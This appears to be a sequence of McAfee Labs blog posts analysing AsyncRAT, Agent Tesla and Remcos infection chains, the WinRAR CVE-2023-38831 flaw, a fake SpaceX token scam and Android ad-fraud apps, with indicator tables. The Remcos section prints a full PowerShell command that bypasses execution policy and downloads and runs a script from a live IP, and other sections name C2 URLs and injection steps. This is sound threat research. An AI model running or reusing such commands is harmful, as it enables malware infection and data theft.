97856de8b869999bf7a2d08910721b3508294521bc5766a9dd28d91f479eeb2e | SHA256 | iOS IPA |
fcad6f5c29913c6ab84b0bc48c98a0b91a199ba29cbfc5becced105bb9acefd6 | SHA256 | iOS IPA |
04721303e090160c92625c7f2504115559a124c6deb358f30ae1f43499b6ba3b | SHA256 | iOS Mach-O Binary |
5ccd397ee38db0f7013c52f68a4f7d6a279e95bb611c71e3e2bd9b769c5a700c | SHA256 | iOS Mach-O Binary |
The post Fake Android and iOS apps steal SMS and contacts in South Korea appeared first on McAfee Blog.
Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy
AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity.
McAfee Labs has observed a recent AsyncRAT campaign being distributed through a malicious HTML file. This entire infection strategy employs a range of file types, including PowerShell, Windows Script File (WSF), VBScript (VBS), and more, in order to bypass antivirus detection measures.
Figure 1 – AsyncRAT prevalence for the last one month
A recipient receives a spam email containing a nefarious web link. When accessed, this link triggers the download of an HTML file. Within this HTML file, an ISO file is embedded, and this ISO image file harbors a WSF (Windows Script File). The WSF file subsequently establishes connections with various URLs and proceeds to execute multiple files in formats such as PowerShell, VBS (VBScript), and BAT. These executed files are employed to carry out a process injection into RegSvcs.exe, a legitimate Microsoft .NET utility. This manipulation of RegSvcs.exe allows the attacker to covertly hide their activities within a trusted system application.
Infection Chain
Figure 2 – Infection Chain
Stage 1: Analysis of HTML & WSF file
The sequence begins with a malicious URL found within the email, which initiates the download of an HTML file. Inside this HTML file, an ISO file is embedded. Further JavaScript is utilized to extract the ISO image file.
Figure 3 – Contents of HTML file
Figure 4 – Extracted ISO file when HTML is run
Within the ISO file is a WSF script labeled as “FXM_20231606_9854298542_098.wsf.” This file incorporates junk strings of data, interspersed with specific “<job>” and “<VBScript>” tags (as indicated in Figure 5 and highlighted in red). These tags are responsible for establishing a connection to the URL “hxxp://45.12.253.107:222/f[.]txt” to fetch a PowerShell file.
Figure 5 – Contents of WSF file
Stage 2: Analysis of PowerShell files
The URL “hxxp://45.12.253.107:222/f[.]txt” retrieves a text file that contains PowerShell code.
Figure 6 – Contents of the First PowerShell file
The initial PowerShell code subsequently establishes a connection to another URL, “hxxp://45.12.253.107:222/j[.]jpg,” and retrieves the second PowerShell file.
Figure 7 – Contents of Second PowerShell file
The PowerShell script drops four files into the ProgramData folder, including two PowerShell files, one VBS file, and one BAT file. The contents of these four files are embedded within this PowerShell script. It then proceeds to create a folder named “xral” in the ProgramData directory, where it writes and extracts these files, as depicted in Figure 8.
Figure 8 – Second PowerShell creating 4 files and writing content in them using [IO.File]::WriteAllText command
Figure 9 – Files extracted in the “ProgramData/xral” folder
Stage 3: Analysis of Files dropped in the ProgramData folder
Following this, the PowerShell script executes “xral.ps1,” which is responsible for establishing a scheduled task to achieve persistence. Additionally, it initiates the execution of the ” xral.vbs ” file.
Figure 10 – Content of VBS file
The VBS script proceeds to execute the “1.bat” file, which, in turn, is responsible for executing the final PowerShell script, “hrlm.ps1.”
In a nutshell, after the second powershell, the execution goes like:
xral.ps1 -> xral.vbs -> 1.bat -> hrlm.ps1
These various executions of different file types are strategically employed to circumvent both static and behavior-based antivirus detections.
Stage 4: Analysis of the final PowerShell file
Figure 11 – Content of final PowerShell file
As depicted in the preceding figure, this PowerShell file contains a PE (Portable Executable) file in hexadecimal format. This file is intended for injection into a legitimate process. In the second red-highlighted box, it’s evident that the attackers have obfuscated the process name, which will be revealed after performing a replacement operation. It is now evident that this PE file is intended for injection into “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe.” The process injection is accomplished through the Reflection Assembly load functionality of the PowerShell file, which allows access and invocation of .NET data from within PowerShell.
After the process injection, the RegSvcs utility is initiated and executed without any additional parameters.
Stage 5: Analysis of infected RegSvcs.exe
Once PowerShell successfully injects malicious code into RegSvcs, the compromised RegSvcs.exe runs, and the AsyncRAT server establishes a connection to it. The artifacts of this infected RegSvcs.exe running are illustrated in Figure 12.
Figure 12 – AsyncRAT server strings in RegSvcs
Further analysis uncovered that this sample possesses keylogging capabilities. It recorded all activities performed on the system after replication, storing this information in a “log.tmp” file within the TEMP folder for record-keeping purposes.
Figure 13 – Log file created in %temp% folder logging all keystrokes
Furthermore, this sample was actively engaged in the theft of credentials and browser-related data. Additionally, it attempted to search for cryptocurrency-related information, including data related to Bitcoin, Ethereum, and similar assets. The illicitly acquired data was being transmitted over TCP to the IP address 45[.]12.253.107 on port 8808.
Figure 14 – TCP information of RegSvcs.exe
The infection chain begins with a malicious URL embedded in a spam email, leading to the download of an HTML file containing an ISO. Within the ISO file, a WSF script connects to external URLs and downloads a PowerShell script, which, in turn, initiates a series of non-PE file executions and ultimately injects a hexadecimal-encoded PE file into the legitimate “RegSvcs.exe.” This compromised process connects to an AsyncRAT server. The malware exhibits keylogging capabilities, records user activities, and steals credentials, browser data, and crypto-related information. Data is exfiltrated over TCP to an IP address and port. This intricate chain leverages diverse file types and obfuscation methods to avoid detection, ultimately resulting in the attackers gaining remote control and successfully stealing data.
File | SHA256/URL |
HTML | 83c96c9853245a32042e45995ffa41393eeb9891e80ebcfb09de8fae8b5055a3 |
ISO | 97f91122e541b38492ca2a7c781bb9f6b0a2e98e5b048ec291d98c273a6c3d62 |
WSF | ac6c6e196c9245cefbed223a3b02d16dd806523bba4e74ab1bcf55813cc5702a |
PS1 | 0159bd243221ef7c5f392bb43643a5f73660c03dc2f74e8ba50e4aaed6c6f531 |
PS1 | f123c1df7d17d51115950734309644e05f3a74a5565c822f17c1ca22d62c3d99 |
PS1 | 19402c43b620b96c53b03b5bcfeaa0e645f0eff0bc6e9d1c78747fafbbaf1807 |
VBS | 34cb840b44befdd236610f103ec1d0f914528f1f256d9ab375ad43ee2887d8ce |
BAT | 1c3d5dea254506c5f7c714c0b05f6e2241a25373225a6a77929e4607eb934d08 |
PS1 | 83b29151a192f868362c0ecffe5c5fabe280c8baac335c79e8950fdd439e69ac |
URL | hxxp://45.12.253[.]107:222/f[.]txt |
hxxp://45.12.253[.]107:222/j[.]jpg |
The post Unmasking AsyncRAT New Infection Chain appeared first on McAfee Blog.
Authored by Neil Tyagi
On 23 August 2023, NIST disclosed a critical RCE vulnerability CVE-2023-38831. It is related to an RCE vulnerability in WinRAR before version 6.23. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the harmless file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file.
Our intelligence shows that this vulnerability is being exploited as early as April 2023. Let’s look at a sample exploiting this vulnerability (Hash: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa)
Global Heatmap where this vulnerability is being seen in the wild(based on McAfee telemetry data)
Infection chain
How does the vulnerability work?
Normal.zip
Weaponized.zip
Normal Zip
Weaponized Zip
Normal zip
Weaponized zip
IOC’s
Sha256 | Detection |
bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa | Trojan:Archive/2023_38831.NEAA
|
%APPDATA%\Nvidia\Core.ocx
Recommendations
The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.
Authored by Yashvi Shah
Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.
Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.
The following heat map shows the current prevalence of Agent Tesla on field:
Figure 1: Agent Tesla heat map
McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.
The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.
Figure 2: Infection Chain
VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.
Figure 3: Process Tree
The first PowerShell command is encoded as illustrated here:
Figure 4: Encoded First PowerShell
Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:
Figure 5: Decoded content
The deciphered content serves as the parameter passed to the second instance of PowerShell..
Figure 6: Second PowerShell command
Deconstructing this command line for clearer comprehension:
Figure 7: Disassembled command
As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:
Figure 8: Downloaded image
This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.
Figure 9: Steganography
After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.
Figure 10: DLL obtained from steganography
This DLL serves two purposes:
Figure 11: DLL loaded
In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:
$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)
The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:
http://195.178.120.24 /castrnewbaze64.txt
Figure 12: Request for payload
Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.
Figure 13: Downloaded text file
In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.
Figure 14: Final payload
In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:
“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.
Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.
Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:
Figure 15: Process Injection
By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,
“kern!”.Replace(“!”, “el32”) à kernel32
Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx
As a result, these functions translate into the subsequent API calls:
Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.
The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:
Figure 16: Obfuscation
Fingerprinting:
Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:
Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.
Figure 17: Opera browser
Figure 18: Yandex browser
Figure 19: Iridium browser
Figure 20: Chromium browser
Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:
Figure 21: User data retrieval from all browsers -1
Figure 22: User data retrieval from all browsers – 2
Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:
Figure 23: Mail clients
Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.
The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.
Figure 24: Function calls made for exfiltration.
This is the procedure by which functions are invoked to facilitate data extraction via SMTP:
Figure 25: Port number
Figure 26: Domain retrieval
Figure 27: Email address used
Figure 28: Password
The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.
Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.
The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.
File | MD5 | SHA256 |
VBS file | e2a4a40fe8c8823ed5a73cdc9a8fa9b9 | e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5 |
JPEG file | ec8dfde2126a937a65454323418e28da | 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f |
DLL file | b257f83495996b9a79d174d60dc02caa | b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f |
Final payload | dd94daef4081f63cf4751c3689045213 | abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42 |
Table 1:Indicators of Compromise
The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.
Authored by Preksha Saxena
McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.
Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary.
Figure 1: Execution Flow
VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too.
Investigating this VBS script started with dealing with the large comment blocks as shown in figure below.
Figure 2:VBS Script
One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line.
Another part of VBS script is the execute function shown in below image, which merely decodes a fake message.
“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!”
Figure 3:Deobfuscating PowerShell command using replace function.
The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to:
“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();”””
The downloaded file, 87656.txt, is an obfuscated PowerShell script.
Figure 4:Obfuscated PowerShell Script
The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection.
Figure 5:Resolving IEX
Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.
Decompressed data is again a PowerShell script which is analyzed below.
The decompressed PowerShell script is large and obfuscated:
Figure 6: Decompressed PowerShell script
The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable.
Figure 7:Deobfuscating PowerShell script
The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage.
Figure 8: Base64 encoded data.
The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.
Figure 9: Code used for PE injection.
Windows Defender exclusions are added.
Figure 10: Exclusion code
The 1.1MB PE file is a .NET binary, using an MSIL loader.
Figure 11: MSIL Loader
The Main function calls the Units function, which calls a random function.
Figure 12:Main function
The random function contains a large amount of encrypted data, stored in a text variable.
Figure 13: Encrypted data
The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal).
Figure 14: code for converting data to uppercase.
The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below.
To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function.
Figure 15: RC4 algorithm
Figure 16: New instance created for decrypted dll
Decrypted DLL ‘dGXsvRf.dll’ is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload.
Figure 17: Encrypted payload
SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.
Figure 18: SykCryptor Encrypted data
Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”.
Figure 19: RC4 Algorithm
Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation.
Figure 20: Loading DLL for deflation.
The DLL then decrypts a list of various security solution process names:
Figure 21:Code for decrypting Security processes Names
The decrypted list of process names include:
vsserv bdservicehost odscanui bdagent
bullgaurd BgScan BullGuardBhvScanner etc.
The malware also drops acopy of itself in the %appdata% folder using cmd.
Figure 22: Copying file.
To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry.
Figure 23: Persistence Mechanism
The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on.
Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread.
Figure 24: Process Injection
The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are:
Figure 25: Strings in payload
The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long.
Figure 26: RC4 encrypted configuration file
Decrypted Configuration:
Figure 27: Decrypted configuration
The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware.
RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe.
SHA256 | Filetype |
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67 | VBS |
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c | PowerShell |
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4 | MSIL loader |
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf | SykCrypter |
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517 | Remcos Payload |
The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.
Authored by: Neil Tyagi
Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash.
Crypto scammers use many tactics in other financial crimes, such as pump-and-dump scams that lure investors to purchase an asset with fake claims about its value or outright attempts to steal digital assets.
This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction.
It starts with a Tweet used as bait to lure innocent cryptocurrency investors into purchasing a non-existent token, related to a reputed company, SpaceX.
The theme used here by scammers is the sale of the official cryptocurrency of SpaceX. In the above image we can also see the reach of the tweet is high. (224.4K views)
McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.
The link present in this tweet redirects to space[-]launch[.]net, which is already marked as malicious by McAfee.
A WHOIS search on the site reveals it is hosted on Cloudflare. Cloudflare has increasingly become the number one choice for scammers to host malicious websites and protect their assets.
A WHOIS lookup on the domain reveals redacted personal information. No surprises there
When we click on the link, it takes us to a login page and asks for SpaceX login credentials. This page was designed as a phishing page for people who have real SpaceX login credentials.
For people who don’t have SpaceX credentials, they can use the signup link.
After we log in, it redirects to a landing page where one can purchase the supposedly original cryptocurrency launched by SpaceX
As you can see, it impersonates as the official SpaceX portal for buying their token. It also has all the elements related to SpaceX and its branding.
In the above picture, we can see that scammers are employing the social engineering trick of FOMO (Fear Of Missing Out) as they have created a timer showing that the fake tokens are only available for purchase for the next 10 hours. This also makes sure that the scam would end before all the online security vendors flag the site.
Scammers also allow users to purchase fake tokens from about 22 cryptocurrencies, the prominent being Bitcoin, Ethereum, and USDT.
Scammers even offer a bonus of fake SpaceX tokens if users are ready to purchase a minimum amount
Here we can find the BTC wallet address of the scammers and see the transactions related to these wallets.
The crypto wallet addresses of scammers for the following currencies are.
Looking at transactions related to these addresses, we find people have become victims of this scam by sending payments to these wallets. The Bitcoin wallet above has gathered around 2,780 US dollars. You can also see three of the last transactions made to the account.
Similarly, for Ethereum, the scammers have gathered around 1,450 US dollars
We observed two popular cryptocurrencies, but scammers are using about 22 different crypto wallets.
Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices.
Domain | Crypto Type | Wallet address |
space[-]launch[.]net | BTC | bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee |
space[-]launch[.]net | USDT | 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 |
space[-]launch[.]net | ETH | 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 |
space[-]launch[.]net | XRP | rnmj4xsaaEaGvFbrsg3wCR6Hp2ZvgjMizF |
space[-]launch[.]net | DASH | XxD3tJ7RA81mZffKFiycASMiDsUdqjLFD1 |
space[-]launch[.]net | BCH | qr45csehwfm5uu9xu4mqpptsvde46t8ztqkzjlww68 |
space[-]launch[.]net | USDC | 0x398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 |
The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.
Authored by SangRyol Ryu, McAfee Threat Researcher
We live in a world where advertisements are everywhere, and it’s no surprise that users are becoming tired of them. By contrast, developers are driven by profit and seek to incorporate more advertisements into their apps. However, there exist certain apps that manage to generate profit without subjecting users to the annoyance of ads. Is this really good?
Recently, McAfee’s Mobile Research Team discovered a concerning practice among some apps distributed through Google Play. These apps load ads while the device’s screen is off, which might initially seem convenient for users. However, it’s a clear violation of Google Play Developer policy on how ads should be displayed. This affects not only the advertisers who pay for invisible Ads, but also the users as it drains battery, consumes data and poses potential risks such as information leaks and disruption of user profiling caused by Clicker behavior.
The team has identified 43 apps that collectively downloaded 2.5 million times. Among the targeted apps are TV/DMB Player, Music Downloader, News, and Calendar applications. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Most apps are no longer available on Google Play while others are updated by the developer. McAfee Mobile Security detects this threat as Android/Clicker. For more information, and to get fully protected, visit McAfee Mobile Security.
Many affected apps
This ad fraud library uses specific tactics to avoid detection and inspection. It deliberately delays the initiation of its fraudulent activities, creating a latent period from the time of installation. What’s more, all the intricate configurations of this library can be remotely modified and pushed using Firebase Storage or Messaging service. These factors significantly add to the complexity of identifying and analyzing this fraudulent behavior. Notably, the latent period typically spans several weeks, which makes it challenging to detect.
Getting latent period by using Firebase Messaging Service
It is important to be cautious about the implications of granting permissions, such as excluding ‘power saving’ and allowing ‘draw over other apps’. These permissions can enable certain activities to occur discreetly in the background, raising concerns about the intentions and behavior of the applications or libraries in question. Allowing these permissions can result in more malicious behavior, such as displaying phishing pages, also to displaying ads in the background.
Asked permissions to run in the background and keep it hidden
When the device screen is turned off after the latent period, the fetching and loading of ads starts, resulting in users being unaware of the presence of running advertisements on their devices. This ad library registers device information by accessing the unique domain (ex: mppado.oooocooo.com) linked with the application. Then go to Firebase Storage to get the specific advertisement URL and show the ads. It is important to note that this process consumes power and mobile data resources.
Observed traffic when the screen off
If users quickly turn on their screens at this point, they might catch a glimpse of the ad before it is automatically closed.
Example of an advertising site displayed when the screen is off
In conclusion, it is essential for users to exercise caution and carefully evaluate the necessity of granting permissions like power saving exclusion, or draw over other apps before allowing them. While these permissions might be required for certain legitimate functionalities for running in the background, it is important to consider the potential risks linked with them, such as enabling hidden behaviors or reducing the relevance of ads and contents displayed to users because the hidden Clicker behavior. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience. For more information, visit McAfee Mobile Security
best.7080music.com
m.gooogoole.com
barocom.mgooogl.com
newcom.mgooogl.com
easydmb.mgooogl.com
freekr.mgooogl.com
fivedmb.mgooogl.com
krlive.mgooogl.com
sixdmb.mgooogl.com
onairshop.mgooogle.com
livedmb.mgooogle.com
krbaro.mgooogle.com
onairlive.mgooogle.com
krdmb.mgooogle.com
onairbest.ocooooo.com
dmbtv.ocooooo.com
ringtones.ocooooo.com
onairmedia.ocooooo.com
onairnine.ocooooo.com
liveplay.oocooooo.com
liveplus.oocooooo.com
liveonair.oocooooo.com
eightonair.oocooooo.com
krmedia.oocooooo.com
kronair.oocooooo.com
newkrbada.ooooccoo.com
trot.ooooccoo.com
thememusic.ooooccoo.com
trot.ooooccoo.com
goodkrsea.ooooccoo.com
krlive.ooooccoo.com
news.ooooccoo.com
bestpado.ooooccoo.com
krtv.oooocooo.com
onairbaro.oooocooo.com
barolive.oooocooo.com
mppado.oooocooo.com
dmblive.oooocooo.com
baromedia.oooocooo.com
musicbada.oouooo.com
barolive.oouooo.com
sea.oouooo.com
blackmusic.oouooo.com
Package Name | Application Name | SHA256 | Google Play Downloads |
band.kr.com | DMB TV | f3e5aebdbd5cd94606211b04684730656e0eeb1d08f4457062e25e7f05d1c2d1 | 10,000+ |
com.dmb.media | DMB TV | 6aaaa6f579f6a1904dcf38315607d6a5a2ca15cc78920743cf85cc4b0b892050 | 100,000+ |
dmb.onair.media | DMB TV | a98c5170da2fdee71b699ee145bfe4bdcb586b623bbb364a93bb8bdf8dbc4537 | 10,000+ |
easy.kr | DMB TV | 5ec8244b2b1f516fd96b0574dc044dd40076ff7aa7dadb02dfefbd92fc3774bf | 100,000+ |
kr.dmb.onair | DMB TV | e81c0fef52065864ee5021e1d4c7c78d6a407579e1d48fc4cf5551ff0540fdb8 | 5,000+ |
livedmb.kr | DMB TV | 33e5606983526757fef2f6c1da26474f4f9bf34e966d3c204772de45f42a6107 | 50,000+ |
stream.kr.com | DMB TV | a13e26bce41f601a9fafdec8003c5fd14908856afbab63706b133318bc61b769 | 100+ |
com.breakingnews.player | 뉴스 속보 | d27b8e07b7d79086af2fa805ef8d77ee51d86a02d81f2b8236febb92cb9b242d | 10,000+ |
jowonsoft.android.calendar | 달력 | 46757b1f785f2b3cec2906a97597b7db4bfba168086b60dd6d58d5a8aef9e874 | 10,000+ |
com.music.free.bada | 뮤직다운 | a3fe9f9b531ab6fe79ed886909f9520a0d0ae98cf11a98f061dc179800aa5931 | 100,000+ |
